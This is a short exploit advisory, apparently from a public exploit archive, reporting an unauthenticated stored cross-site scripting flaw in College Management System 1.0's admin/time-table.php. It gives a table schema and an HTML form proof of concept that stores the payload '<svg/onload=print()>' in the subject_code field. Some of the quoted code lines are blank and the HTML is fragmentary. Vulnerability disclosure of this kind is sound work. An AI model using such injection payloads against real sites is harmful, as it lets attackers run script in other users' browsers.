College Management System 1.0 Cross Site Scripting

College Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

MD5 | fbedbfd2771cf6a28832ff287eefc9b4

# Exploit Title: college management system - Stored Cross-Site Scripting (XSS) Unauthenticated
# Date: 01/10/2021
# Exploit Author: Abdulrahman
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested on: Kali Linux

in admin/time-table.php in line 1 :

if (!$_SESSION["LoginAdmin"])
require_once "../connection/connection.php";

in admin/time-table.php in line 17 - 27 :








is vulnerable to XSS and SqlInjection

Table structure for table `time_table`

CREATE TABLE `time_table` (
`id` int(11) NOT NULL,
`course_code` varchar(10) NOT NULL,
`semester` int(11) NOT NULL,
`timing_from` varchar(10) NOT NULL,
`timing_to` varchar(10) NOT NULL,
`day` varchar(20) NOT NULL,
`subject_code` varchar(20) NOT NULL,
`room_no` int(11) NOT NULL

20 char


<html lang="en">
<body class="login-background">
<!doctype html>
<html lang="en">
<meta charset="utf-8">

<!-- css style goes here -->
<link rel="stylesheet" href="" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">

<!-- css style go to end here -->
<link rel="stylesheet" href="">

<div class="modal-dialog modal-lg">
<div class="modal-content">
<div class="modal-header bg-info text-white">
<h4 class="modal-title text-center">Add Time Table</h4>
<div class="modal-body">
<form action="" method="post">
<div class="form-group">
<div class="formp">
<label for="exampleInputPassword1">day No:</label>
<input type="text" name="day" class="form-control" value="5">
<div class="form-group">
<div class="formp">
<label for="exampleInputPassword1">subject_code No:</label>
<input type="text" name="subject_code" class="form-control" value="<svg/onload=print()>">
<div class="modal-footer">
<input type="submit" class="btn btn-primary" name="btn_save" value="Save Data">
<button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>

Related Posts